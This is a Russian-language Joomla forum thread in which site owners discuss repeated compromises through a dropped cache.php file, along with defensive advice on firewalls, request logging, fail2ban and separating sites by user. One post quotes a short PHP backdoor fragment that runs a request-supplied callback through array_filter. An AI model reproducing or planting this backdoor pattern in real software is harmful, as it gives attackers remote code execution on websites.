0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 1963 Просмотров
*

mak200

  • Осваиваюсь на форуме
  • 69
  • -1
Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.
Спойлер
[свернуть]

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.
Спойлер
[свернуть]

Кто-то может подсказать в чем уязвимость?
*

draff

  • Практически профи
  • 2769
  • 171
  • step by step
Re: Как понять в чем уязвимость сайта?
« Ответ #1 : 08.06.2016, 18:48:54 »
Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите
*

mak200

  • Осваиваюсь на форуме
  • 69
  • -1
Re: Как понять в чем уязвимость сайта?
« Ответ #2 : 08.06.2016, 19:12:36 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
*

winstrool

  • Завсегдатай
  • 769
  • 40
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #3 : 08.06.2016, 19:26:02 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

mak200

  • Осваиваюсь на форуме
  • 69
  • -1
Re: Как понять в чем уязвимость сайта?
« Ответ #4 : 08.06.2016, 19:37:29 »
Сначала почистите сайт,

Это сделал.

наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.
*

winstrool

  • Завсегдатай
  • 769
  • 40
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #5 : 08.06.2016, 21:14:16 »
Это что такое, расширение какое-то? Первый раз слышу.
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

voland

  • Профи
  • 9467
  • 422
  • Эта строка съедает место на вашем мониторе
Re: Как понять в чем уязвимость сайта?
« Ответ #6 : 08.06.2016, 21:23:22 »
А где ж версии и что стоит?
*

Филипп Сорокин

  • Практически профи
  • 1814
  • 138
Re: Как понять в чем уязвимость сайта?
« Ответ #7 : 08.06.2016, 21:29:04 »
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Круто!
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг
*

Филипп Сорокин

  • Практически профи
  • 1814
  • 138
Re: Как понять в чем уязвимость сайта?
« Ответ #8 : 08.06.2016, 21:31:56 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Ставь лайк, если согласен, и делай репост!

  => мои публикации
    => мои работы
      => спектр моих услуг
*

winstrool

  • Завсегдатай
  • 769
  • 40
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #10 : 08.06.2016, 22:49:24 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

mak200

  • Осваиваюсь на форуме
  • 69
  • -1
Re: Как понять в чем уязвимость сайта?
« Ответ #11 : 09.06.2016, 00:10:34 »
Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.
*

finkel

  • Новичок
  • 2
  • 0
Re: Как понять в чем уязвимость сайта?
« Ответ #12 : 28.06.2016, 00:19:12 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

Цитировать
IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
*

winstrool

  • Завсегдатай
  • 769
  • 40
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #13 : 28.06.2016, 11:57:21 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

finkel

  • Новичок
  • 2
  • 0
Re: Как понять в чем уязвимость сайта?
« Ответ #14 : 28.06.2016, 16:48:48 »
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.
*

Ragivort

  • Живу я здесь
  • 1010
  • 49
  • Есть мечта-стоит жить
Re: Как понять в чем уязвимость сайта?
« Ответ #16 : 05.07.2016, 12:41:49 »
 
Ну вы их хоть разделили? Чтобы опять такого не было.
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Дозволь мне свершить то добро, которое я способен свершить, теперь, ибо я могу более не вернуться сюда.
*

flyingspook

  • Moderator
  • 3619
  • 236
Re: Как понять в чем уязвимость сайта?
« Ответ #17 : 05.07.2016, 14:46:09 »
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как исправить уязвимость в Joomla 1.5.26 - libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045,?

Автор Elimelech

Ответов: 4
Просмотров: 486
Последний ответ 03.09.2017, 16:24:17
от Sorbon
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 589
Просмотров: 191937
Последний ответ 06.08.2017, 12:41:32
от winstrool
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 24
Просмотров: 2204
Последний ответ 26.07.2017, 12:09:01
от winstrool
Вынос configuration.php за пределы корня сайта

Автор Sulpher

Ответов: 10
Просмотров: 11126
Последний ответ 18.06.2017, 22:24:19
от winstrool
IPSecure - защита сайта от ботов

Автор SeBun

Ответов: 1
Просмотров: 580
Последний ответ 09.05.2017, 12:09:17
от SeBun